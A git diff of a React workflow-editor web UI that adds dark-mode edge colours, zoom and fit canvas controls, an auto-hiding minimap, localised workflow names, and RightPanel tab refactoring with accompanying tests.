-import { Code2, Zap, GitBranch, RotateCw, X, ChevronRight, Wrench, Sparkles, Globe, Workflow } from 'lucide-react';
+import { Code2, Zap, GitBranch, RotateCw, RotateCcw, X, ChevronRight, ChevronUp, ChevronDown, Wrench, Sparkles, Globe, Workflow, ZoomIn, ZoomOut, Scan } from 'lucide-react';
 import { WorkflowJSON, WorkflowNode as APINode } from '@/api/workflow';
+import { ThemeContext } from '@/contexts/ThemeContext';
 import {
   buildWorkflowGraphLayout,
   WORKFLOW_GRAPH_NODE_WIDTH,
@@ -472,13 +472,15 @@ function NodeDetailModal({ node, isStart, onClose }: NodeDetailModalProps) {
 // Layout builder
 // ─────────────────────────────────────────────
 
-const EDGE_THEME: Record<WorkflowGraphEdgeRoute['kind'], {
+type FlowEdgeTheme = Record<WorkflowGraphEdgeRoute['kind'], {
   stroke: string;
   label: string;
   labelBg: string;
   strokeWidth: number;
   strokeDasharray?: string;
-}> = {
+}>;
+
+const LIGHT_EDGE_THEME: FlowEdgeTheme = {
   default: {
     stroke: '#94a3b8',
     label: '#64748b',
@@ -506,9 +508,38 @@ const EDGE_THEME: Record<WorkflowGraphEdgeRoute['kind'], {
   },
 };
 
+const DARK_EDGE_THEME: FlowEdgeTheme = { // Dark-mode edge palette; one entry per edge route kind.
+  default: {
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.7,
+  },
+  branch: { // buildLayout also reuses branch.stroke for trigger edges.
+    stroke: '#f59e0b',
+    label: '#fbbf24',
+    labelBg: '#3d3424',
+    strokeWidth: 2.2,
+  },
+  loop: {
+    stroke: '#a78bfa',
+    label: '#c4b5fd',
+    labelBg: '#363047',
+    strokeWidth: 2,
+  },
+  back: { // Same colours as `default`, but drawn dashed.
+    stroke: '#5a6573',
+    label: '#b8c2cc',
+    labelBg: '#303842',
+    strokeWidth: 1.8,
+    strokeDasharray: '6 5',
+  },
+};
+
 function buildLayout(
   workflowJson: WorkflowJSON,
-  onNodeClick: (nodeId: string) => void
+  onNodeClick: (nodeId: string) => void,
+  edgeTheme: FlowEdgeTheme
 ): { nodes: Node[]; edges: Edge[] } {
   const diagram = buildWorkflowGraphLayout(workflowJson);
   const startId = workflowJson.start || workflowJson.nodes[0]?.id;
@@ -535,7 +566,7 @@ function buildLayout(
   const edges: Edge[] = workflowJson.edges.map((edge, idx) => {
     const id = workflowGraphEdgeId(edge, idx);
     const route = diagram.edgeRoutes[id] ?? { kind: 'default' as const };
-    const theme = EDGE_THEME[route.kind];
+    const theme = edgeTheme[route.kind];
 
     return {
       id,
@@ -597,7 +628,7 @@ function buildLayout(
           type: 'smoothstep',
           animated: Boolean(trigger.enabled),
           markerEnd: { type: MarkerType.ArrowClosed, width: 16, height: 16 },
-          style: { stroke: '#7dd3fc', strokeWidth: 1.5, strokeDasharray: '5 4' },
+          style: { stroke: edgeTheme.branch.stroke, strokeWidth: 1.5, strokeDasharray: '5 4' },
         });
       }
     });
@@ -610,6 +641,30 @@ function buildLayout(
 // Main component
 // ─────────────────────────────────────────────
 
+function CanvasControlButton({ // Icon button for the canvas control stack; `label` doubles as aria-label and tooltip text.
+  label,
+  onClick,
+  children,
+}: {
+  label: string; // accessible name, also rendered inside the tooltip span
+  onClick: () => void; // called when the button is clicked
+  children: ReactNode; // button content (callers in this file pass an icon)
+}) {
+  return (
+    <button
+      type="button"
+      onClick={onClick}
+      aria-label={label}
+      className="group relative flex h-8 w-full items-center justify-center text-slate-500 transition-colors hover:bg-slate-50 hover:text-slate-700 focus:outline-none focus:ring-2 focus:ring-red-100 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50 dark:focus:ring-zinc-700"
+    >
+      {children}
+      <span className="pointer-events-none absolute right-full top-1/2 z-20 mr-2 -translate-y-1/2 whitespace-nowrap rounded-md bg-slate-900 px-2 py-1 text-[11px] font-medium text-white opacity-0 shadow-sm transition-opacity group-hover:opacity-100 group-focus-visible:opacity-100 dark:bg-zinc-800 dark:text-zinc-50">
+        {label}
+      </span>
+    </button>
+  );
+}
+
 export interface FlowCanvasProps {
   workflowJson: WorkflowJSON;
   /** 预留：true 时允许编辑连线，false 时只读连线（拖拽节点位置始终可用） */
@@ -627,8 +682,41 @@ export interface FlowCanvasProps {
 }
 
 function FlowCanvasInner({ workflowJson, editable = false, onNodeClick: externalOnNodeClick, layoutKey }: FlowCanvasProps) {
-  const { fitView } = useReactFlow();
+  const { t } = useTranslation('workflow');
+  const { theme } = useContext(ThemeContext);
+  const { fitView, zoomIn, zoomOut } = useReactFlow();
+  const isDark = theme === 'dark';
+  const edgeTheme = useMemo(() => (isDark ? DARK_EDGE_THEME : LIGHT_EDGE_THEME), [isDark]);
   const [selectedNodeId, setSelectedNodeId] = useState<string | null>(null);
+  const [controlsCollapsed, setControlsCollapsed] = useState(false);
+  const [showMiniMap, setShowMiniMap] = useState(false);
+  const miniMapTimerRef = useRef<number | null>(null);
+  // Shows the minimap and (re)starts the 2200 ms timer that hides it again; any pending timer is cancelled first.
+  const revealMiniMap = useCallback(() => {
+    setShowMiniMap(true);
+    if (miniMapTimerRef.current !== null) {
+      window.clearTimeout(miniMapTimerRef.current);
+    }
+    miniMapTimerRef.current = window.setTimeout(() => {
+      setShowMiniMap(false);
+      miniMapTimerRef.current = null;
+    }, 2200);
+  }, []);
+  // Capture-phase pointer/wheel handler: reveals the minimap only when the event target lies inside a `.react-flow` element.
+  const handleCanvasOperation = useCallback((event: React.PointerEvent<HTMLDivElement> | React.WheelEvent<HTMLDivElement>) => {
+    const target = event.target as HTMLElement | null;
+    if (target?.closest('.react-flow')) {
+      revealMiniMap();
+    }
+  }, [revealMiniMap]);
+  // On unmount, cancel any pending minimap hide timer.
+  useEffect(() => {
+    return () => {
+      if (miniMapTimerRef.current !== null) {
+        window.clearTimeout(miniMapTimerRef.current);
+      }
+    };
+  }, []);
 
   const handleNodeClick = useCallback((nodeId: string) => {
     if (externalOnNodeClick) {
@@ -642,25 +730,55 @@ function FlowCanvasInner({ workflowJson, editable = false, onNodeClick: external
   const [nodes, setNodes, onNodesChange] = useNodesState<Node>([]);
   const [edges, setEdges] = useEdgesState<Edge>([]);
 
-  // Rebuild layout whenever workflowJson or layoutKey changes
-  useEffect(() => {
-    const { nodes: newNodes, edges: newEdges } = buildLayout(workflowJson, handleNodeClick);
+  const applyLayout = useCallback((options: { reveal?: boolean } = {}) => {
+    const { nodes: newNodes, edges: newEdges } = buildLayout(workflowJson, handleNodeClick, edgeTheme);
     setNodes(newNodes);
     setEdges(newEdges);
+    if (options.reveal) {
+      revealMiniMap();
+    }
     // Re-fit after layout (small delay lets ReactFlow measure node sizes first)
     setTimeout(() => fitView({ padding: 0.2 }), 60);
-  }, [workflowJson, handleNodeClick, setNodes, setEdges, layoutKey]);
+  }, [workflowJson, handleNodeClick, edgeTheme, setNodes, setEdges, fitView, revealMiniMap]);
+
+  const resetLayout = useCallback(() => {
+    applyLayout({ reveal: true });
+  }, [applyLayout]);
+
+  // Rebuild layout whenever workflowJson or layoutKey changes
+  useEffect(() => {
+    applyLayout();
+  }, [applyLayout, layoutKey]);
 
   const onInit = useCallback(() => {
     setTimeout(() => fitView({ padding: 0.2 }), 50);
   }, [fitView]);
 
+  const handleZoomIn = useCallback(() => { // Reveal the minimap, then zoom in; zoomIn's return value is intentionally discarded.
+    revealMiniMap();
+    void zoomIn();
+  }, [revealMiniMap, zoomIn]);
+  // Reveal the minimap, then zoom out; zoomOut's return value is intentionally discarded.
+  const handleZoomOut = useCallback(() => {
+    revealMiniMap();
+    void zoomOut();
+  }, [revealMiniMap, zoomOut]);
+  // Reveal the minimap, then fit the view using the same 0.2 padding as the other fitView calls in this component.
+  const handleFitView = useCallback(() => {
+    revealMiniMap();
+    void fitView({ padding: 0.2 });
+  }, [fitView, revealMiniMap]);
+
   const selectedNode = selectedNodeId
     ? workflowJson.nodes.find((n) => n.id === selectedNodeId) ?? null
     : null;
 
   return (
-    <div className="relative w-full h-full">
+    <div
+      className="relative w-full h-full"
+      onPointerDownCapture={handleCanvasOperation}
+      onWheelCapture={handleCanvasOperation}
+    >
       <ReactFlow
         nodes={nodes}
         edges={edges}
@@ -677,24 +795,56 @@ function FlowCanvasInner({ workflowJson, editable = false, onNodeClick: external
         fitViewOptions={{ padding: 0.2 }}
         proOptions={{ hideAttribution: true }}
       >
-        <Background variant={BackgroundVariant.Dots} gap={20} size={1} color="#e2e8f0" />
-        <Controls showInteractive={false} className="!shadow-sm !border !border-gray-200 !rounded-xl" />
-        <MiniMap
-          nodeColor={(node) => {
-            const colors: Record<string, string> = {
-              python: '#60a5fa',
-              logic: '#34d399',
-              branch: '#fbbf24',
-              loop: '#c084fc',
-            };
-            const d = node.data as unknown as ViewNodeData | undefined;
-            return colors[d?.nodeType ?? ''] ?? '#94a3b8';
-          }}
-          className="!border !border-gray-200 !shadow-sm !rounded-xl"
-          maskColor="rgba(241, 245, 249, 0.7)"
-        />
+        <Background variant={BackgroundVariant.Dots} gap={20} size={1} color={isDark ? '#5a6573' : '#e2e8f0'} />
+        {showMiniMap && (
+          <MiniMap
+            nodeColor={(node) => {
+              const colors: Record<string, string> = {
+                python: '#60a5fa',
+                logic: '#34d399',
+                branch: '#fbbf24',
+                loop: '#c084fc',
+              };
+              const d = node.data as unknown as ViewNodeData | undefined;
+              return colors[d?.nodeType ?? ''] ?? '#94a3b8';
+            }}
+            className="!rounded-lg !border !border-slate-200 !bg-white/95 !shadow-none dark:!border-zinc-700 dark:!bg-zinc-900"
+            maskColor={isDark ? 'rgba(34, 39, 46, 0.72)' : 'rgba(241, 245, 249, 0.68)'}
+          />
+        )}
       </ReactFlow>
 
+      <div className="absolute right-4 top-4 z-20 flex w-9 flex-col items-stretch gap-1 overflow-visible">
+        {!controlsCollapsed && (
+          <div className="flex w-full flex-col divide-y divide-slate-100 overflow-visible rounded-lg border border-slate-200 bg-white/90 backdrop-blur dark:divide-zinc-800 dark:border-zinc-700 dark:bg-zinc-900/90">
+            <CanvasControlButton label={t('detail.flowControls.zoomIn')} onClick={handleZoomIn}>
+              <ZoomIn className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+            <CanvasControlButton label={t('detail.flowControls.zoomOut')} onClick={handleZoomOut}>
+              <ZoomOut className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+            <CanvasControlButton label={t('detail.flowControls.fitView')} onClick={handleFitView}>
+              <Scan className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+            <CanvasControlButton label={t('detail.resetLayout')} onClick={resetLayout}>
+              <RotateCcw className="h-4 w-4" strokeWidth={1.8} />
+            </CanvasControlButton>
+          </div>
+        )}
+        <button
+          type="button"
+          onClick={() => setControlsCollapsed((prev) => !prev)}
+          aria-label={t(controlsCollapsed ? 'detail.flowControls.expand' : 'detail.flowControls.collapse')}
+          className="flex h-8 w-full items-center justify-center rounded-lg border border-slate-200 bg-white/90 text-slate-500 backdrop-blur transition-colors hover:bg-slate-50 hover:text-slate-700 focus:outline-none focus:ring-2 focus:ring-red-100 dark:border-zinc-700 dark:bg-zinc-900/90 dark:text-zinc-300 dark:hover:bg-zinc-800 dark:hover:text-zinc-50 dark:focus:ring-zinc-700"
+        >
+          {controlsCollapsed ? (
+            <ChevronDown className="h-4 w-4" strokeWidth={1.8} />
+          ) : (
+            <ChevronUp className="h-4 w-4" strokeWidth={1.8} />
+          )}
+        </button>
+      </div>
+
       {/* Node detail modal — only shown when no external onNodeClick handler */}
       {!externalOnNodeClick && (
         <NodeDetailModal
diff --git a/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx b/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx
index 07b1a6171..e040d3150 100644
--- a/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx
+++ b/webui/src/pages/WorkflowDetail/NodeInfoPanel.tsx
@@ -7,6 +7,7 @@ import { useTranslation } from 'react-i18next';
 import { X, AlertCircle, Save, Loader2, ChevronDown, ChevronRight, Play, RotateCcw, Maximize2 } from 'lucide-react';
 import { workflowAPI, Workflow, WorkflowEdge, WorkflowExecution, WorkflowNode, WorkflowNodeExecution } from '@/api/workflow';
 import CopyButton from '@/components/common/CopyButton';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 // ─────────────────────────────────────────────
 // Constants
@@ -168,11 +169,11 @@ function ExpandedCodeEditor({
   }, [lineNumbers.length]);
 
   return (
-    <div className="flex h-full min-h-0 min-w-0 overflow-hidden rounded-xl border border-[#30363d] bg-[#0d1117]">
+    <div className="flex h-full min-h-0 min-w-0 overflow-hidden rounded-xl border border-[#4a5563] bg-[#252c35]">
       <div
         aria-hidden="true"
         data-testid="expanded-code-line-numbers"
-        className="flex-shrink-0 overflow-hidden select-none border-r border-[#30363d] bg-[#0b0f14] px-3 py-3 text-right font-mono text-[12px] leading-relaxed text-[#6e7681]"
+        className="flex-shrink-0 overflow-hidden select-none border-r border-[#4a5563] bg-[#20262d] px-3 py-3 text-right font-mono text-[12px] leading-relaxed text-[#9aa7b4]"
       >
         <div ref={lineNumberTrackRef}>
           {lineNumbers.map((lineNumber) => (
@@ -189,7 +190,7 @@ function ExpandedCodeEditor({
         onScroll={syncLineNumberOffset}
         rows={24}
         wrap="off"
-        className="h-full min-h-0 min-w-0 w-full resize-none overflow-auto bg-[#0d1117] px-4 py-3 font-mono text-[12px] leading-relaxed text-[#e6edf3] focus:outline-none focus:ring-2 focus:ring-red-400"
+        className="h-full min-h-0 min-w-0 w-full resize-none overflow-auto bg-[#252c35] px-4 py-3 font-mono text-[12px] leading-relaxed text-[#d7dee8] focus:outline-none focus:ring-2 focus:ring-[#539bf5]"
         placeholder={placeholder}
         spellCheck={false}
       />
@@ -596,7 +597,7 @@ function NodeRunSection({
 }
 
 export default function NodeInfoPanel({ node, workflow, latestExecution, width = 260, onClose, onSaved }: NodeInfoPanelProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const [form, setForm]       = useState<WorkflowNode>({ ...node });
   const [saving, setSaving]   = useState(false);
   const [savedOk, setSavedOk] = useState(false);
@@ -698,7 +699,7 @@ export default function NodeInfoPanel({ node, workflow, latestExecution, width =
                 onChange={(e) => set('code', e.target.value)}
                 rows={12}
                 className="w-full px-2.5 py-2.5 rounded-lg text-[11px] font-mono resize-y focus:outline-none focus:ring-2 focus:ring-red-400
-                           bg-[#0d1117] text-[#e6edf3] border border-[#30363d] leading-relaxed"
+                           bg-[#252c35] text-[#d7dee8] border border-[#4a5563] leading-relaxed"
                 placeholder={t('detail.nodeInfo.codePlaceholder')}
                 spellCheck={false}
               />
@@ -787,7 +788,11 @@ export default function NodeInfoPanel({ node, workflow, latestExecution, width =
               <div><FL required>{t('detail.nodeInfo.subworkflow')}</FL>
                 <select value={form.workflow_id ?? ''} onChange={(e) => set('workflow_id', e.target.value)} className={SL}>
                   <option value="">{t('detail.nodeInfo.selectWorkflow')}</option>
-                  {avail.map((wf) => <option key={wf.id} value={wf.id}>{wf.name}</option>)}
+                  {avail.map((wf) => (
+                    <option key={wf.id} value={wf.id}>
+                      {getWorkflowDisplayName(wf, i18n?.language) /* null-safe like RightPanel/TopBar: i18n can be missing when useTranslation is mocked with only `t` */}
+                    </option>
+                  ))}
                 </select>
               </div>
               <JsonField label={t('detail.nodeInfo.inputMapping')} value={form.inputs_mapping} onChange={(v) => set('inputs_mapping', v)} />
@@ -842,7 +847,7 @@ export default function NodeInfoPanel({ node, workflow, latestExecution, width =
                 {t('detail.nodeInfo.closeExpandedEditor')}
               </button>
             </div>
-            <div className="flex-1 min-h-0 min-w-0 bg-[#0d1117] p-4">
+            <div className="flex-1 min-h-0 min-w-0 bg-[#252c35] p-4">
               <ExpandedCodeEditor
                 value={form.code ?? ''}
                 onChange={(value) => set('code', value)}
diff --git a/webui/src/pages/WorkflowDetail/RightPanel.test.tsx b/webui/src/pages/WorkflowDetail/RightPanel.test.tsx
index 42e7f4d4e..717d83f53 100644
--- a/webui/src/pages/WorkflowDetail/RightPanel.test.tsx
+++ b/webui/src/pages/WorkflowDetail/RightPanel.test.tsx
@@ -1,4 +1,5 @@
 import { render, screen } from '@testing-library/react';
+import userEvent from '@testing-library/user-event';
 import { describe, expect, it, vi } from 'vitest';
 
 import RightPanel from './RightPanel';
@@ -10,9 +11,8 @@ vi.mock('react-i18next', () => ({
     t: (key: string) => {
       const translations: Record<string, string> = {
         'detail.rightPanel.tabOverview': '概览',
-        'detail.rightPanel.tabChat': 'AI 编辑',
-        'detail.rightPanel.tabRun': '运行',
-        'detail.rightPanel.tabIntegration': '集成',
+        'detail.rightPanel.tabChat': '工作台',
+        'detail.rightPanel.tabIntegration': '发布',
         'detail.rightPanel.deleteWorkflow': '删除工作流',
         'detail.rightPanel.deleting': '删除中...',
         'detail.rightPanel.deleteConfirmTitle': '删除工作流',
@@ -36,10 +36,6 @@ vi.mock('./tabs/ChatTab', () => ({
   default: () => <div>chat tab</div>,
 }));
 
-vi.mock('./tabs/RunTab', () => ({
-  default: () => <div>run tab</div>,
-}));
-
 vi.mock('./tabs/IntegrationTab', () => ({
   default: () => <div>integration tab</div>,
 }));
@@ -81,4 +77,56 @@ describe('RightPanel', () => {
 
     expect(screen.queryByRole('button', { name: '前往会话列表查看' })).not.toBeInTheDocument();
   });
+  // The tab bar must not render '测试' (test), '历史' (history) or '运行' (run) buttons.
+  it('不在右侧顶栏渲染测试、历史和运行分栏', () => {
+    render(
+      <RightPanel
+        workflow={makeWorkflow()}
+        open
+      />,
+    );
+
+    expect(screen.queryByRole('button', { name: '测试' })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: '历史' })).not.toBeInTheDocument();
+    expect(screen.queryByRole('button', { name: '运行' })).not.toBeInTheDocument();
+  });
+  // Controlled mode: with activeTab supplied, a tab click is only reported via onActiveTabChange and the rendered tab stays on the prop value.
+  it('支持外部控制当前 Tab', async () => {
+    const user = userEvent.setup();
+    const onActiveTabChange = vi.fn();
+
+    render(
+      <RightPanel
+        workflow={makeWorkflow()}
+        open
+        activeTab="chat"
+        onActiveTabChange={onActiveTabChange}
+      />,
+    );
+
+    expect(screen.getByText('chat tab')).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '发布' }));
+
+    expect(onActiveTabChange).toHaveBeenCalledWith('integration');
+    expect(screen.getByText('chat tab')).toBeInTheDocument();
+  });
+  // The delete button is shown on the default overview tab and hidden after switching to the '工作台' (chat) tab.
+  it('只在概览 Tab 显示删除工作流按钮', async () => {
+    const user = userEvent.setup();
+
+    render(
+      <RightPanel
+        workflow={makeWorkflow()}
+        open
+        onDelete={vi.fn()}
+      />,
+    );
+
+    expect(screen.getByRole('button', { name: '删除工作流' })).toBeInTheDocument();
+
+    await user.click(screen.getByRole('button', { name: '工作台' }));
+
+    expect(screen.queryByRole('button', { name: '删除工作流' })).not.toBeInTheDocument();
+  });
 });
diff --git a/webui/src/pages/WorkflowDetail/RightPanel.tsx b/webui/src/pages/WorkflowDetail/RightPanel.tsx
index be2b15157..49d1ab880 100644
--- a/webui/src/pages/WorkflowDetail/RightPanel.tsx
+++ b/webui/src/pages/WorkflowDetail/RightPanel.tsx
@@ -4,9 +4,11 @@ import { useTranslation } from 'react-i18next';
 import { Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
 import { useConfirm } from '@/components/common/ConfirmDialog';
 import OverviewTab from './tabs/OverviewTab';
-import ChatTab from './tabs/ChatTab';
-import RunTab from './tabs/RunTab';
+import ChatTab, { type WorkflowChatLaunchRequest } from './tabs/ChatTab';
 import IntegrationTab from './tabs/IntegrationTab';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
+
+export type { WorkflowChatLaunchRequest };
 
 // ─────────────────────────────────────────────
 // Error boundary helpers
@@ -60,18 +62,23 @@ class TabErrorBoundary extends Component<
 // RightPanel
 // ─────────────────────────────────────────────
 
-type TabId = 'chat' | 'overview' | 'run' | 'integration';
+export type RightPanelTabId = 'chat' | 'overview' | 'integration';
 
 interface RightPanelProps {
   workflow: Workflow;
   latestExecution?: WorkflowExecution | null;
   open: boolean;
   width?: number;
+  activeTab?: RightPanelTabId;
+  chatLaunchRequest?: WorkflowChatLaunchRequest | null;
+  onChatLaunchRequestHandled?: (id: number) => void;
+  onActiveTabChange?: (tab: RightPanelTabId) => void;
   onLatestExecutionChange?: (execution: WorkflowExecution | null) => void;
   onExecutionSettled?: () => void;
   onWorkflowUpdated?: (updated: Workflow) => void;
   onFirstMessageSent?: () => void;
   onSessionChange?: (sessionId: string | null) => void;
+  onGuidePrompt?: (prompt: string, displayLabel: string) => void;
   /** Currently selected node — passed to ChatTab to show reference chip in input */
   selectedNode?: WorkflowNode | null;
   onDeselectNode?: () => void;
@@ -80,23 +87,37 @@ interface RightPanelProps {
 
 export default function RightPanel({
   workflow, latestExecution, open, width = 320,
+  activeTab,
+  chatLaunchRequest,
+  onChatLaunchRequestHandled,
+  onActiveTabChange,
   onLatestExecutionChange,
   onExecutionSettled,
   onWorkflowUpdated,
   onFirstMessageSent,
   onSessionChange,
+  onGuidePrompt,
   selectedNode, onDeselectNode,
   onDelete,
 }: RightPanelProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
   const confirm = useConfirm();
-  const [activeTab, setActiveTab] = useState<TabId>('overview');
+  const workflowDisplayName = getWorkflowDisplayName(workflow, i18n?.language);
+  const [internalActiveTab, setInternalActiveTab] = useState<RightPanelTabId>('overview');
   const [deleting, setDeleting] = useState(false);
+  const currentActiveTab = activeTab ?? internalActiveTab;
+
+  const handleTabChange = (tab: RightPanelTabId) => {
+    if (activeTab === undefined) {
+      setInternalActiveTab(tab);
+    }
+    onActiveTabChange?.(tab);
+  };
 
   const handleDelete = async () => {
     const ok = await confirm({
       title: t('detail.rightPanel.deleteConfirmTitle'),
-      description: t('detail.rightPanel.deleteConfirmDesc', { name: workflow.name }),
+      description: t('detail.rightPanel.deleteConfirmDesc', { name: workflowDisplayName }),
       confirmText: t('detail.rightPanel.deleteConfirmText'),
       variant: 'danger',
     });
@@ -109,16 +130,15 @@ export default function RightPanel({
     }
   };
 
-  const TABS: { id: TabId; label: string }[] = [
+  const TABS: { id: RightPanelTabId; label: string }[] = [
     { id: 'overview',     label: t('detail.rightPanel.tabOverview') },
     { id: 'chat',         label: t('detail.rightPanel.tabChat') },
-    { id: 'run',          label: t('detail.rightPanel.tabRun') },
     { id: 'integration',  label: t('detail.rightPanel.tabIntegration') },
   ];
 
   return (
     <div
-      className="flex flex-col bg-white border-l border-gray-200 flex-shrink-0 overflow-hidden transition-[width] duration-300 ease-in-out"
+      className="relative z-10 flex min-w-0 flex-col bg-white border-l border-gray-200 flex-shrink-0 overflow-hidden transition-[width] duration-300 ease-in-out"
       style={{ width: open ? width : 0 }}
     >
       {/* Tab bar */}
@@ -126,13 +146,13 @@ export default function RightPanel({
         {TABS.map((tab) => (
           <button
             key={tab.id}
-            onClick={() => setActiveTab(tab.id)}
+            onClick={() => handleTabChange(tab.id)}
             className={`flex-1 py-3 text-xs font-medium transition-colors relative ${
-              activeTab === tab.id ? 'text-red-600' : 'text-gray-500 hover:text-gray-700'
+              currentActiveTab === tab.id ? 'text-red-600' : 'text-gray-500 hover:text-gray-700'
             }`}
           >
             {tab.label}
-            {activeTab === tab.id && (
+            {currentActiveTab === tab.id && (
               <span className="absolute bottom-0 left-0 right-0 h-0.5 bg-red-600 rounded-full" />
             )}
           </button>
@@ -141,21 +161,22 @@ export default function RightPanel({
 
       {/* Tab content */}
       <div className="flex-1 min-h-0 overflow-hidden flex flex-col">
-        {activeTab === 'chat' && (
+        {currentActiveTab === 'chat' && (
           <ChatTab
             workflow={workflow}
             onLatestExecutionChange={onLatestExecutionChange}
             onWorkflowUpdated={onWorkflowUpdated}
             onFirstMessageSent={onFirstMessageSent}
             onSessionChange={onSessionChange}
+            launchRequest={chatLaunchRequest}
+            onLaunchRequestHandled={onChatLaunchRequestHandled}
             selectedNode={selectedNode}
             onNodeRefDismiss={onDeselectNode}
           />
         )}
-        {activeTab === 'overview' && <OverviewTab workflow={workflow} />}
-        {activeTab === 'run' && (
+        {currentActiveTab === 'overview' && (
           <TabErrorBoundary>
-            <RunTab
+            <OverviewTab
               workflow={workflow}
               latestExecution={latestExecution ?? null}
               onLatestExecutionChange={onLatestExecutionChange}
@@ -163,15 +184,19 @@ export default function RightPanel({
             />
           </TabErrorBoundary>
         )}
-        {activeTab === 'integration' && (
+        {currentActiveTab === 'integration' && (
           <TabErrorBoundary>
-            <IntegrationTab workflow={workflow} onWorkflowUpdated={onWorkflowUpdated} />
+            <IntegrationTab
+              workflow={workflow}
+              onWorkflowUpdated={onWorkflowUpdated}
+              onGuidePrompt={onGuidePrompt}
+            />
           </TabErrorBoundary>
         )}
       </div>
 
-      {/* 底部删除按钮 */}
-      {onDelete && (
+      {/* Bottom delete button: shown only on the overview tab so no destructive action is exposed during the edit/integration flows */}
+      {onDelete && currentActiveTab === 'overview' && (
         <div className="flex items-center justify-end gap-2 px-4 py-3 border-t border-gray-100 flex-shrink-0">
           <button
             onClick={handleDelete}
diff --git a/webui/src/pages/WorkflowDetail/TopBar.tsx b/webui/src/pages/WorkflowDetail/TopBar.tsx
index cf5395b18..d4064fa03 100644
--- a/webui/src/pages/WorkflowDetail/TopBar.tsx
+++ b/webui/src/pages/WorkflowDetail/TopBar.tsx
@@ -2,6 +2,7 @@ import { Link } from 'react-router-dom';
 import { ArrowLeft, PanelRight, PanelRightClose } from 'lucide-react';
 import { useTranslation } from 'react-i18next';
 import { Workflow, WorkflowExecution } from '@/api/workflow';
+import { getWorkflowDisplayName } from '@/utils/workflowDisplay';
 
 interface TopBarProps {
   workflow: Workflow;
@@ -11,7 +12,8 @@ interface TopBarProps {
 }
 
 export default function TopBar({ workflow, latestExecution, panelOpen, onTogglePanel }: TopBarProps) {
-  const { t } = useTranslation('workflow');
+  const { t, i18n } = useTranslation('workflow');
+  const displayName = getWorkflowDisplayName(workflow, i18n?.language);
 
   const statusConfig = {
     draft:    { label: t('status.draft'),    className: 'bg-gray-100 text-gray-700' },
@@ -43,7 +45,7 @@ export default function TopBar({ workflow, latestExecution, panelOpen, onToggleP
       {/* Workflow name + status */}
       <div className="flex flex-col flex-1 min-w-0">
         <div className="flex items-center gap-2 min-w-0">
-          <h1 className="text-sm font-semibold text-gray-900 truncate">{workflow.name}</h1>
+          <h1 className="text-sm font-semibold text-gray-900 truncate">{displayName}</h1>
           <span className={`px-2 py-0.5 rounded-full text-xs font-medium flex-shrink-0 ${status.className}`}>
             {status.label}
           </span>
diff --git a/webui/src/pages/WorkflowDetail/index.tsx b/webui/src/pages/WorkflowDetail/index.tsx
index ec556a510..a3074d55f 100644
--- a/webui/src/pages/WorkflowDetail/index.tsx
+++ b/webui/src/pages/WorkflowDetail/index.tsx
@@ -1,33 +1,58 @@
-import { useState, useEffect, useRef, useCallback } from 'react';
+import { useState, useEffect, useRef, useCallback, useMemo } from 'react';
 import { useParams, useNavigate } from 'react-router-dom';
-import ReactMarkdown from 'react-markdown';
-import remarkGfm from 'remark-gfm';
 import { useTranslation } from 'react-i18next';
-import { X, GitBranch, FileText, Code2, Layout, Download, FileJson } from 'lucide-react';
+import { X, GitBranch, FileText, Code2, FileJson, Bot } from 'lucide-react';
 import { workflowAPI, Workflow, WorkflowExecution, WorkflowNode } from '@/api/workflow';
+import { sessionApi } from '@/api/session';
 import LoadingSpinner from '@/components/common/LoadingSpinner';
+import WorkflowDocumentPanel, { type WorkflowDocumentMode } from '@/components/common/WorkflowDocumentPanel';
+import WorkflowMarkdownDiffReview from '@/components/common/WorkflowMarkdownDiffReview';
 import TopBar from './TopBar';
 import FlowCanvas from './FlowCanvas';
-import RightPanel from './RightPanel';
+import RightPanel, { type RightPanelTabId, type WorkflowChatLaunchRequest } from './RightPanel';
 import { extractErrorMessage } from '@/utils/error';
 import NodeInfoPanel from './NodeInfoPanel';
+import { buildWorkflowMarkdown } from '@/utils/workflowMarkdown';
+import {
+  acceptTextDiffHunk,
+  buildLineDiff,
+  buildTextDiffHunks,
+  rejectTextDiffHunk,
+  type TextDiffHunk,
+} from '@/utils/textDiff';
+import { useConfirm } from '@/components/common/ConfirmDialog';
+import {
+  SIDE_PANEL_MIN_WIDTH,
+  getInitialSidePanelWidth,
+  getMaxSidePanelWidth,
+} from '@/components/common/sidePanelSizing';
 
 type CanvasTab = 'flow' | 'md' | 'json';
 
-const PANEL_MIN = 240;
-const PANEL_RATIO = 0.40; // 初始占可用宽度的 40%
+interface EditDocDiff {
+  before: string;
+  after: string;
+}
 
-function getInitialPanelWidth() {
-  // 可用宽度 = 视口宽度 - 侧边导航栏（lg 以上为 256px）
-  const sidebarWidth = window.innerWidth >= 1024 ? 256 : 0;
-  const available = window.innerWidth - sidebarWidth;
-  return Math.max(PANEL_MIN, Math.round(available * PANEL_RATIO));
+interface WorkflowChatSessionRef {
+  workflowId: string;
+  sessionId: string;
+}
+
+function hasWorkflowJsonDefinition(workflow: Workflow | null) {
+  if (!workflow) return false;
+  return Boolean(
+    workflow.workflowJson.start
+    || workflow.workflowJson.nodes.length > 0
+    || workflow.workflowJson.edges.length > 0
+  );
 }
 
 export default function WorkflowDetail() {
   const { t } = useTranslation('workflow');
   const { id } = useParams<{ id: string }>();
   const navigate = useNavigate();
+  const confirm = useConfirm();
 
   const CANVAS_TABS: { id: CanvasTab; label: string; icon: React.ReactNode }[] = [
     { id: 'flow', label: t('detail.canvasTabs.flow'), icon: <GitBranch className="w-3.5 h-3.5" /> },
@@ -39,14 +64,25 @@ export default function WorkflowDetail() {
